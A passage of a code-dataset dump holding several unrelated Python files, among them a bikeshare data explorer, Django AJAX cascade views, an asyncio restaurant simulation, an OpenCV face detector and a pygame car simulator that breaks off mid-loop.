(from monday to sunday)\\n\").lower()\n if day in [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\", \"saturday\", \"sunday\", \"all\"]:\n print ('input pass')\n break\n else:\n print (invalid_input)\n return city, month, day\n\ndef data_load(city, month, day):\n \"\"\"load the data for the selected city and filter it by month and day;\n \"all\" skips the corresponding filter.\"\"\"\n if city != 'all':\n file_name = city_data[city]\n df =pd.read_csv(file_name)\n else:\n df =pd.concat(map(pd.read_csv,['chicago.csv','new_york_city.csv', 'washington.csv']),sort=True)\n #convert the format of Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['End Time'] = pd.to_datetime(df['End Time'])\n #create a column \"month\"\n df['month'] = df['Start Time'].dt.month\n #create a column \"day of week\"\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n #create a column \"duration of trip\"\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n #print(month)\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n #print(df)\n else:\n df = df\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n else:\n df=df\n #print(df)\n\n return df\ndef stat(df):\n question = input (\"Do you want to include all statistical tests? Yes or No, any word other than yes or no will be considered as yes\\n\").lower()\n if question !=(\"no\"):\n #display the distribution of trip duration\n start_time=time.time()\n print(\"The distribution of trip duration(second):\\n\",df['Trip Duration'].describe()[['mean','std','25%','50%','75%']].round(1))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most commonly used start station\n start_time=time.time()\n print('\\n\\nMost commonly used start station:\\n',df['Start Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most commonly used end station\n start_time=time.time()\n print('\\n\\nMost commonly used end station:\\n',df['End Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display most frequent route\n start_time=time.time()\n Start_Stop_stations = df['Start Station'] + \"*\" + df['End Station']\n common_station = Start_Stop_stations.value_counts().idxmax()\n print('\\n\\nMost frequently used route is:\\n{} \\nto\\n{}'.format(common_station.split('*')[0], common_station.split('*')[1]))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display total travelling events\n start_time=time.time()\n print(\"\\n\\nThe total trip events are:\\n\",df['Start Station'].count())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #display Birth year of client\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of distribution of Birth Year of clients!\")\n if 'Birth Year' not in df:\n print(\"\\n\\nNo data available!\")\n elif False in df['Birth Year'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Birth Year'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].dropna(axis=0).describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds 
---\" % (time.time() - start_time))\n\n else:\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n #counter the gender of clients\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of gender of clients!\")\n if 'Gender' not in df:\n print(\"\\n\\nNo data available!\")\n elif False in df['Gender'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Gender'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].dropna(axis=0).value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n else:\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n elif question == (\"no\"):\n\n\n while True:\n question1=input(\"Do you want to calculate the distribution of trip duration? yes or no\\n\").lower()\n if question1==(\"yes\"):\n start_time=time.time()\n print(\"The distribution of trip duration(second):\\n\",df['Trip Duration'].describe()[['mean','std','25%','50%','75%']].round(1))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question1==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question2=input(\"\\nDo you want to view the most commonly used start station? yes or no\\n\").lower()\n if question2==(\"yes\"):\n start_time=time.time()\n print('Most commonly used start station:\\n', df['Start Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question2==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question3=input(\"\\nDo you want to view the most commonly used end station? yes or no\\n\").lower()\n if question3==(\"yes\"):\n start_time=time.time()\n print('Most commonly used End station:\\n', df['End Station'].value_counts().idxmax())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question3==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question4=input(\"\\nDo you want to view the most commonly used route? yes or no\\n\").lower()\n Start_Stop_stations = df['Start Station'] + \"*\" + df['End Station']\n common_station = Start_Stop_stations.value_counts().idxmax()\n if question4==(\"yes\"):\n start_time=time.time()\n print('Most frequent used route is:\\n{} \\nto\\n{}'.format(common_station.split('*')[0], common_station.split('*')[1]))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question4==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question5=input(\"\\nDo you want to view total travelling events? 
yes or no\\n\").lower()\n if question5==(\"yes\"):\n start_time=time.time()\n print(\"The total trip events are:\\n\",df['Start Station'].count())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question5==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question6=input(\"\\nDo you want to know the Birth Year disbribution of clients\\n\").lower()\n if question6==(\"yes\"):\n start_time=time.time()\n print(\"\\n\\nNow working on analysis of distribution of Birth Year of clients!\")\n if 'Birth Year' not in df:\n print(\"\\n\\nNo data available!\")\n break\n elif False in df['Birth Year'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Birth Year'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].dropna(axis=0).describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif False not in df['Birth Year'].isnull():\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\nThe distribution of Birth Year of clients:\\n\",df['Birth Year'].describe()[['mean','std','25%','50%','75%']].round(0))\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif question6==(\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n while True:\n question7=input(\"\\nDo you want to know the gender counts of clients\\n\").lower()\n if question7==(\"yes\"):\n start_time=time.time()\n print(\"\\n\\nnNow working on analysis of gender of clients!\")\n if 'Gender' not in df:\n print(\"\\n\\nNo data available!\")\n break\n elif False in df['Gender'].isnull():\n print(\"\\n\\nNumber of NaN value is:\\n\", df['Gender'].isnull().sum())\n print(\"\\n\\nExcluding NaN data!\")\n print(\"\\n\\nThe counts of gender of clients:\\n\",df['Gender'].dropna(axis=0).value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n elif False not in df['Gender'].isnull():\n print(\"\\n\\nNo NaN data!\")\n print(\"\\n\\The counts of gender of clients:\\n\",df['Gender'].value_counts())\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n break\n else:\n print(\"The input is invalid!\")\n\n\n\n\n\ndef display_data(df):\n n=0\n while True:\n questions6=input(\"\\nDO you want to view raw data?(20 line each time)\\n\").lower()\n if questions6==('yes'):\n print(\"Raw data are:\\n\\n\", df.iloc[n:n+20])\n n=n+20\n elif questions6==('no'):\n break\n else:\n print (\"The input is invalid!\")\n return display_data(df)\ndef restart():\n while True:\n restart = input(\"Do you want to restart?\\n\").lower()\n if restart== (\"yes\"):\n main()\n elif restart == (\"no\"):\n break\n else:\n print(\"The input is invalid!\")\n\n\ndef main():\n city,month,day=filter_data()\n df=data_load(city, month, day)\n stat(df)\n display_data(df)\n restart()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"503002776","text":"\n\nfrom xai.brain.wordbase.nouns._disappearance import _DISAPPEARANCE\n\n#calss header\nclass _DISAPPEARANCES(_DISAPPEARANCE, ):\n\tdef __init__(self,): \n\t\t_DISAPPEARANCE.__init__(self)\n\t\tself.name = \"DISAPPEARANCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"disappearance\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_disappearances.py","file_name":"_disappearances.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"132774329","text":"'''\n@author: haiwen\n@date: 2021/3/3\n@file: test_contract.py\n'''\nimport allure\nimport pytest\n\nfrom pylibs.plugins.convert_data import current_time, get_param, dynamic_report\n\n\n# @allure.title('{name}')\n@dynamic_report('name')\n@pytest.mark.parametrize(['name','amount'],get_param('casedata/api_testdata.yml'))\ndef test_tc003001(empty_contracts,init_account,init_contract_type,init_org,name,amount):\n ctapi=empty_contracts\n othercompany=init_account['_id'] #签约对象\n contract_type=init_contract_type['_id'] #合同分类\n company_id=init_org['_id'] #部门\n #参数字典\n kwargs={\n 'name' : name,\n 'amount':amount,\n 'othercompany' : othercompany,\n 'contract_type' : contract_type,\n 'company_id' : company_id,\n 'create_date' : current_time()\n }\n #创建合同\n contract= ctapi.add(**kwargs)\n\n #检查合同是否创建\n contract_list = ctapi.list_all()\n assert contract in contract_list\n\n\n","sub_path":"projectChapter/d/testcase/webapi/D-管理员登录/D-销售部门/D-签约对象马总/D-合同分类-采购合同/test_contract.py","file_name":"test_contract.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"45565273","text":"# coding=utf-8\r\n\r\nfrom utils.views import AbsDefaultView\r\nfrom django.shortcuts import render_to_response\r\nfrom django.http import HttpResponseRedirect\r\nfrom module.common import get_top_left_modules, get_modules_core\r\n\r\nfrom django.http import HttpResponse\r\nfrom utils import render_to_response_json\r\nfrom dict.models import *\r\nfrom dict.forms import *\r\nfrom soft_enter.models import dict_School_tp \r\nimport xlrd\r\n\r\ndef ajax_adm_region(request):\r\n province_code = request.GET.get('province_code', None)\r\n city_code = request.GET.get('city_code', None)\r\n if province_code:\r\n html = \"\"\r\n if not city_code:\r\n adms = AdministrativeRegion.objects.filter(province_code = province_code).distinct().values(\"city_code\", \"city_name\")\r\n for adm in adms:\r\n html += \"\" % (adm[\"city_code\"], adm[\"city_name\"])\r\n elif city_code:\r\n adms = AdministrativeRegion.objects.filter(province_code = province_code, city_code = city_code).values(\"id\", \"county_name\")\r\n for adm in adms:\r\n html += \"\" % (adm[\"id\"], adm[\"county_name\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_master_direction(request):\r\n '''研究生学院、专业、研究方向三级级联'''\r\n master_college = request.GET.get('college', None)\r\n master_major = request.GET.get('major', None)\r\n if master_college:\r\n html = \"\"\r\n if not master_major:\r\n mcs = MasterCatalogue.objects.filter(yxsdm = master_college).distinct().values(\"zydm\", \"zymc\",\"zydm\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"zydm\"], mc[\"zymc\"],mc[\"zydm\"])\r\n elif master_major:\r\n mcs = MasterCatalogue.objects.filter(yxsdm = master_college, zydm = master_major).values(\"id\", \"yjfxmc\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"id\"], mc[\"yjfxmc\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_master_direction_2013(request):\r\n '''研究生学院、专业、研究方向三级级联'''\r\n master_college = request.GET.get('college', None)\r\n master_major = request.GET.get('major', None)\r\n if 
master_college:\r\n html = \"\"\r\n if not master_major:\r\n mcs = MasterCatalogue_2013.objects.filter(yxsdm = master_college).distinct().values(\"zydm\", \"zymc\",\"zydm\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"zydm\"], mc[\"zymc\"],mc[\"zydm\"])\r\n elif master_major:\r\n mcs = MasterCatalogue_2013.objects.filter(yxsdm = master_college, zydm = master_major).values(\"id\", \"yjfxmc\")\r\n for mc in mcs:\r\n html += \"\" % (mc[\"id\"], mc[\"yjfxmc\"])\r\n else:\r\n return HttpResponse(\"false\")\r\n return HttpResponse(html)\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_school(request):\r\n '''Cascade from province/city to school'''\r\n ssdm = request.GET.get('ssdm', None)\r\n if ssdm:\r\n html = \"\"\r\n schls = School_UG.objects.filter(district_code = ssdm).values(\"id\", \"school_name\")\r\n for schl in schls:\r\n html += \"\" % (schl[\"id\"], schl[\"school_name\"])\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n \r\ndef ajax_master_major(request):\r\n '''Two-level cascade: college and major'''\r\n yxsdm = request.GET.get('yxsdm', None)\r\n if yxsdm:\r\n html = \"\"\r\n mmjs = Major_Catalogue.objects.filter(yxsdm = yxsdm).values(\"id\",\"zymc\")\r\n for mmj in mmjs:\r\n html += \"\" % (mmj[\"id\"], mmj[\"zymc\"])\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_major(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n mjs = UndergraduateMajor.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 2),))\r\n for mj in mjs:\r\n html += \"\" % (mj.id, mj.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n \r\ndef ajax_adm_city(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_District_City.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_adm_district(request):# temporarily used for software school admissions\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_District.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\ndef ajax_adm_native_district(request):\r\n c = request.GET.get('c', None)\r\n if c:\r\n html = \"\"\r\n citys = GB_NativeDistrict.objects.filter(code__startswith=c).extra(where=('length(code)=' + str(len(c) + 4),))\r\n for city in citys:\r\n html += \"\" % (city.pk, city.name)\r\n return HttpResponse(html)\r\n else:\r\n return HttpResponse(\"false\")\r\n\r\n##################################################\r\n# #\r\n# Dictionary table data maintenance #\r\n# #\r\n##################################################\r\n\r\n### Software engineering / continuing students: undergraduate alma mater data maintenance ###\r\n##################################################\r\nclass DataSchoolView(AbsDefaultView):\r\n DefaultModel = School_UG\r\n DefaultForm = School_UGForm\r\n template_dir = \"dict/School_UG/\"\r\n \r\n list_args = {\"u\":\"school_code__contains\",\r\n \"sname\":\"school_name__contains\",\r\n \"district_name\":\"district_name\",\r\n }\r\n \r\n urlmap = {r\"^$|list/$\": ['list', 'list'],\r\n r\"(?P\\d+)/$\": ['view', 'view'],\r\n r\"(?P\\d+)/update/$\": ['update', 'update'],\r\n r\"(?P\\d+)/delete/$\": ['delete', ''],\r\n r\"add/$\": ['add', 'update'],\r\n \r\n r\"daoru/$\": ['daoru', ''],\r\n }\r\n\r\n def _get_list(self, request):\r\n return 
self.DefaultModel.objects.all().order_by('school_code') \r\n \r\n def _get_list_dicts(self, request):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n school_ug = self.DefaultModel.objects.filter()\r\n lists = []\r\n for i in school_ug:\r\n name = i.district_name\r\n lists.append(name)\r\n school_name = set(lists)\r\n district_name = list(school_name)\r\n dicts.update({'district_name_dic':district_name,})\r\n return dicts\r\n \r\n def _get_update_dicts(self, request):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n return dicts\r\n \r\n def _get_view_dict(self, request, o):\r\n dicts = get_modules_core(request,'/supervise/admin/')\r\n return dicts\r\n \r\n ### For the initial data import only; safe to delete ###\r\n def daoru(self, request, template):\r\n xls_name = \"home/gsmis/work/gsadmission/templates/dict/School_UG/test.xls\"\r\n \r\n bk = xlrd.open_workbook(xls_name)\r\n sheet = bk.sheet_by_index(0)\r\n rows = sheet.nrows\r\n \r\n for row in range(rows):\r\n if row == 0:\r\n continue\r\n sch = self.DefaultModel()\r\n \r\n sch.school_code = str(sheet.cell_value(row, 0))[0:5]\r\n sch.school_name = sheet.cell_value(row, 1)\r\n sch.district_code = str(sheet.cell_value(row, 2))[0:2]\r\n sch.district_name = sheet.cell_value(row, 3)\r\n sch.save()\r\n \r\n return HttpResponseRedirect('/supervise/dict/')\r\n##################################################\r\n","sub_path":"dict/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135798511","text":"import asyncio\nfrom datetime import datetime\n\nasync def get_soda(client):\n print(\" > Remplissage du soda pour {}\".format(client))\n await asyncio.sleep(1)\n print(\" < Le soda de {} est prêt\".format(client))\n\nasync def get_fries(client):\n print(\" > Démarrage de la cuisson des frites pour {}\".format(client))\n await asyncio.sleep(4)\n print(\" < Les frites de {} sont prêtes\".format(client))\n\nasync def get_burger(client):\n print(\" > Commande du burger en cuisine pour {}\".format(client))\n await asyncio.sleep(3)\n print(\" < Le burger de {} est prêt\".format(client))\n\nasync def serve(client):\n print(\"=> Commande passée par {}\".format(client))\n start_time = datetime.now()\n await asyncio.wait(\n [\n get_soda(client),\n get_fries(client),\n get_burger(client)\n ]\n )\n total = datetime.now() - start_time\n print(\"<= {} servi en {}\".format(client, datetime.now() - start_time))\n return total\n\nSODA_LOCK = asyncio.Lock()\n\nasync def get_soda(client):\n # Acquire the lock\n # the syntax 'async with FOO' can be read as 'with (yield from FOO)'\n async with SODA_LOCK:\n # Only one task at a time can execute this block\n print(\" > Remplissage du soda pour {}\".format(client))\n await asyncio.sleep(1)\n print(\" < Le soda de {} est prêt\".format(client))\n\nBURGER_SEM = asyncio.Semaphore(3)\n\nasync def get_burger(client):\n print(\" > Commande du burger en cuisine pour {}\".format(client))\n async with BURGER_SEM:\n await asyncio.sleep(3)\n print(\" < Le burger de {} est prêt\".format(client))\n\nFRIES_COUNTER = 0\nFRIES_LOCK = asyncio.Lock()\n\nasync def get_fries(client):\n global FRIES_COUNTER\n async with FRIES_LOCK:\n print(\" > Récupération des frites pour {}\".format(client))\n if FRIES_COUNTER == 0:\n print(\" ** Démarrage de la cuisson des frites\")\n await asyncio.sleep(4)\n FRIES_COUNTER = 5\n print(\" ** Les frites sont cuites\")\n FRIES_COUNTER -= 1\n print(\" < Les frites de {} sont 
prêtes\".format(client))\n\nasync def perf_test(nb_requests, period, timeout):\n tasks = []\n # On lance 'nb_requests' commandes à 'period' secondes d'intervalle\n for idx in range(1, nb_requests + 1):\n client_name = \"client_{}\".format(idx)\n tsk = asyncio.ensure_future(serve(client_name))\n tasks.append(tsk)\n await asyncio.sleep(period)\n\n finished, _ = await asyncio.wait(tasks)\n success = set()\n for tsk in finished:\n if tsk.result().seconds < timeout:\n success.add(tsk)\n\n print(\"{}/{} clients satisfaits\".format(len(success), len(finished)))\n\n\nloop = asyncio.get_event_loop()\n#loop.run_until_complete(asyncio.wait([serve(clt) for clt in 'ABCD']))\nloop.run_until_complete(perf_test(5, 0.5, 5))\n","sub_path":"AsyncPython.py","file_name":"AsyncPython.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"509396572","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. module:: testLheReader\n :synopsis: Tests the lheReader\n Depends also on lheDecomposer.\n\n.. moduleauthor:: Wolfgang Waltenberger \n\n\"\"\"\n\nimport sys\nsys.path.insert(0,\"../\")\nimport unittest\n\nclass LheReaderTest(unittest.TestCase):\n def testReader(self):\n \"\"\" test the LheReader \"\"\"\n from smodels.theory import lheReader, lheDecomposer, crossSection\n from smodels.tools.physicsUnits import GeV\n\n filename = \"./testFiles/lhe/simplyGluino.lhe\"\n reader = lheReader.LheReader(filename)\n event = reader.next()\n element = lheDecomposer.elementFromEvent(event,\n crossSection.XSectionList())\n s=str(element)\n assert ( s == \"[[[q,q]],[[q,q]]]\" )\n b0=element.branches[0]\n sb0=str(b0)\n assert ( sb0 == \"[[q,q]]\" )\n assert ( b0.masses[0]-675*GeV ) < .1*GeV\n assert ( b0.masses[1]-600*GeV ) < .1*GeV\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/testLheReader.py","file_name":"testLheReader.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"258200910","text":"#Written by Kyle, help provided by Sean Devenport\nimport numpy as np\nimport cv2\n\ndef main():\n\tface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\teye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\tvidcap = cv2.VideoCapture(0)\n\n\twhile True:\n\t\tflg, img=vidcap.read()\n\t\tgray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tif flg:\n\t\t\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\t\t\tfor (x,y,w,h) in faces:\n\t\t\t img = cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),2)\n\t\t\t roi_gray = gray[y:y+h, x:x+w]\n\t\t\t roi_color = img[y:y+h, x:x+w]\n\t\t\t eyes = eye_cascade.detectMultiScale(roi_gray)\n\t\t\t for (ex,ey,ew,eh) in eyes:\n\t\t\t cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(255,0,0),2)\n\n\t\t\tcv2.imshow('img',img)\n\t\t\tif cv2.waitKey(2) & 0xFF == 27:\n\t\t\t\tbreak\n\t\telse:\n\t\t\tbreak\n\tvidcap.release()\n\tcv2.destroyAllWindows()\n\nmain()\n","sub_path":"facial recognition/ViolaJones.py","file_name":"ViolaJones.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"476278582","text":"NOMBRE = \"loren.txt\"\ntry:\n archivo = open(NOMBRE,'r')\n i = 1\n for linea in archivo:\n i = i + 1\n cantidad_lineas = i\n archivo.close()\n\n archivo = open(NOMBRE,'r')\n\n contenido = archivo.read ()\n contenido2=contenido\n palabras = contenido.split()\n cantidad_palabras = len 
(palabras)\n \n archivo.close()\n\n archivo = open(NOMBRE,'r')\n\n w = 0\n for caracter in contenido2:\n w = w + 1\n cantidad_caracteres = w\n archivo.close()\n\n print (cantidad_lineas, cantidad_palabras, cantidad_caracteres)\nexcept FileNotFoundError:\n print (\"El archivo no existe\")\n\n\n","sub_path":"wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393877842","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport pygame\r\nimport numpy as np\r\nimport math\r\nfrom math import sin, radians, degrees, copysign\r\n\r\nclass Car:\r\n # constructor\r\n def __init__(self, x, y, yaw=0.0, max_steering=30, max_acceleration=1000.0):\r\n self.x = x\r\n self.y = y\r\n self.Arr_x = []\r\n self.Arr_y = []\r\n self.Arr_xl = []# modified\r\n self.Arr_yl = []# modified\r\n # car collision flag\r\n self.isCrach = False\r\n\r\n # yaw value\r\n self.yaw = yaw\r\n # maximum acceleration\r\n self.max_acceleration = max_acceleration\r\n # maximum steering angle\r\n self.max_steering = max_steering\r\n # braking deceleration (applied while the space bar is pressed)\r\n self.brake_deceleration = 300\r\n # free (rolling-friction) deceleration (applied when no key is pressed, i.e. foot off the accelerator)\r\n self.free_deceleration = 50\r\n\r\n # linear acceleration\r\n self.linear_acceleration = 10.0\r\n # linear velocity\r\n self.linear_velocity = 0.0\r\n # maximum velocity\r\n self.max_velocity = 1000\r\n # steering angle\r\n self.steering_angle = 0.0\r\n # car wheelbase (distance between the front and rear axles)\r\n self.wheel_base = 84\r\n\r\n # car image coordinates (128x64-pixel car image file, car.png)\r\n self.car_img_x = 0\r\n self.car_img_y = 0\r\n self.car_x_ori = [-64,-64, 64, 64] # four corner points: left top/bottom, right top/bottom\r\n self.car_y_ori = [-32, 32,-32, 32] # four corner points: left top/bottom, right top/bottom\r\n\r\n # coordinates of the stopped car image (added)\r\n self.car_img_x_stop = 1030\r\n self.car_img_y_stop = 170\r\n \r\n def update(self, dt):\r\n # compute the linear velocity (velocity = acceleration x time step)\r\n self.linear_velocity += (self.linear_acceleration * dt)\r\n # clamp the linear velocity to [-max_velocity, max_velocity]\r\n self.linear_velocity = min(max(-self.max_velocity, self.linear_velocity), self.max_velocity)\r\n\r\n self.angular_velocity = 0.0\r\n \r\n # if the steering angle is non-zero\r\n if self.steering_angle != 0.0:\r\n # compute the angular velocity: angular velocity = linear velocity / turning radius\r\n self.angular_velocity = (float(self.linear_velocity) / float(self.wheel_base)) * np.tan(np.radians(self.steering_angle))\r\n \r\n # compute the angular displacement and add it to the yaw (angular velocity x time)\r\n self.yaw += (np.degrees(self.angular_velocity) * dt)\r\n # compute the displacement and store it in spatium (travel distance) 
(linear velocity x time = displacement)\r\n self.spatium = self.linear_velocity * dt\r\n # compute the x,y coordinates using trigonometry\r\n self.x += (self.spatium * np.cos(np.radians(-self.yaw)))\r\n self.y += (self.spatium * np.sin(np.radians(-self.yaw)))\r\n \r\n car_x = [0,0,0,0]\r\n car_y = [0,0,0,0]\r\n for i in range(4):\r\n car_x[i] = self.car_x_ori[i] * np.cos(-radians(self.yaw)) - self.car_y_ori[i] * np.sin(-radians(self.yaw)) + self.x\r\n car_y[i] = self.car_x_ori[i] * np.sin(-radians(self.yaw)) + self.car_y_ori[i] * np.cos(-radians(self.yaw)) + self.y \r\n self.car_img_x = int(round(min(car_x)))\r\n self.car_img_y = int(round(min(car_y)))\r\n print('x, y' , self.x, self.y)\r\n print('x', self.car_img_x)\r\n print('y', self.car_img_y)\r\n\r\n # compute the elapsed time (added)\r\n py_time = round((pygame.time.get_ticks()/1000)%1, 1)\r\n\r\n # append the car position to the queue (added)\r\n self.Arr_xl.append(car_x)# modified\r\n self.Arr_yl.append(car_y)# modified\r\n if py_time==0.2 or py_time==0.4 or py_time==0.6:# modified\r\n self.Arr_x.append(car_x)\r\n self.Arr_y.append(car_y)\r\n\r\n# initialize pygame\r\npygame.init()\r\n\r\n# set the window title\r\npygame.display.set_caption(\"Pygame Car Simulator #1\")\r\n\r\n# set the pygame window size\r\nwidth, height = 1280, 720 \r\n\r\n# apply the configured window size\r\nscreen = pygame.display.set_mode((width, height))\r\n\r\n# clock object used to set the refresh FPS of the main loop\r\nclock = pygame.time.Clock()\r\n\r\n# create the Car object\r\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\r\nimage_path = os.path.join(current_dir, \"car.png\")\r\ncar_image = pygame.image.load(image_path)\r\ncar = Car(100,100)\r\n# create the stopped Car object\r\ncar_image_stop = pygame.image.load(image_path)\r\ncar_stop = Car(1030, 170)\r\n\r\n# flag used to exit the while loop below\r\nexit_flags = False\r\n\r\nwhile not exit_flags:\r\n\r\n # set the refresh FPS of the main loop\r\n clock.tick(60)\r\n\r\n # time step: the time one frame takes to pass;\r\n # needed for formulas such as speed = distance / time\r\n dt = float(clock.get_time()) / float(1000)\r\n \r\n # event handling: only the quit event is checked, setting the exit flag to True\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit_flags = True\r\n \r\n # read the current keyboard state into 'pressed'\r\n pressed = pygame.key.get_pressed()\r\n\r\n # if the up arrow key is pressed\r\n if pressed[pygame.K_UP]:\r\n # if the linear velocity is negative (currently reversing)\r\n if car.linear_velocity < 0:\r\n # apply the braking deceleration\r\n car.linear_acceleration = car.brake_deceleration\r\n # if the linear velocity is positive (currently moving forward)\r\n else:\r\n # increase the acceleration in the (+) direction (speed up forward)\r\n car.linear_acceleration += 10 * dt\r\n \r\n # if the down arrow key is pressed\r\n elif pressed[pygame.K_DOWN]:\r\n # if the linear velocity is positive (currently moving forward)\r\n if car.linear_velocity > 0:\r\n # apply the braking deceleration\r\n car.linear_acceleration = -car.brake_deceleration\r\n # if the linear velocity is negative (currently reversing)\r\n else: \r\n # increase the acceleration in the (-) direction (speed up backward)\r\n car.linear_acceleration -= 10 * dt\r\n \r\n # if the space bar is pressed\r\n elif pressed[pygame.K_SPACE]:\r\n # if |velocity| exceeds (braking deceleration x time step)\r\n if abs(car.linear_velocity) > dt * car.brake_deceleration:\r\n # copysign(x, y): returns the magnitude of x with the sign of y\r\n # subtract the braking deceleration so the car stops quickly\r\n car.linear_acceleration = -copysign(car.brake_deceleration, car.linear_velocity)\r\n # if |velocity| is below (braking deceleration x time step)\r\n 